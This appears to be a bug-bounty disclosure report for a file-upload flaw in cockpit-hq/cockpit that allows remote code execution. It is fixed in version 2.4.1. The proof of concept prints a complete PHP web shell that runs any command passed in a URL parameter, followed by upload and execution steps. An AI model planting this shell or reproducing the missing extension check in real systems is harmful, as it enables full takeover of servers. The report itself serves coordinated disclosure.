File Upload Bypass Leads to Remove Code Execution (RCE) in cockpit-hq/cockpit

Valid

Reported on

Mar 9th 2023

Description

There is no extension checks during file upload. Attacker may upload file to execute malicious code in the server.

Proof of Concept

Step 1: Create a file with the content below and save it as evil.php

<html>
<body>
<form method="GET" name="<?php echo basename($_SERVER['PHP_SELF']); ?>">
<input type="TEXT" name="cmd" autofocus id="cmd" size="80">
<input type="SUBMIT" value="Execute">
</form>
<pre>
<?php
    if(isset($_GET['cmd']))
    {
        system($_GET['cmd']);
    }
?>
</pre>
</body>
</html>

Step 2: Login to the Cockpit web server

Step 3: Go to assets

Step 4: Upload Assets

Step 5: Upload the file that created.

Step 6: Copy asset link and paste it at a new tab.

Step 7: Able to execute any commands.

Impact

Remote code execution (RCE) attacks allow an attacker to remotely execute malicious code on a computer. The impact of an RCE vulnerability can range from malware execution to an attacker gaining full control over a compromised machine.

I am able to gain access to the whole compromised machine.

We are processing your report and will contact the cockpit-hq/cockpit team within 24 hours. 22 days ago
We have contacted a member of the cockpit-hq/cockpit team and are waiting to hear back 21 days ago
Artur validated this vulnerability 21 days ago
choocs has been awarded the disclosure bounty
The fix bounty is now up for grabs
The researcher's credibility has increased: +7
Artur marked this as fixed in 2.4.1 with commit becca8 21 days ago
Artur has been awarded the fix bounty
This vulnerability has been assigned a CVE
Artur published this vulnerability 21 days ago
Assets.php#L129-L180 has been validated
to join this conversation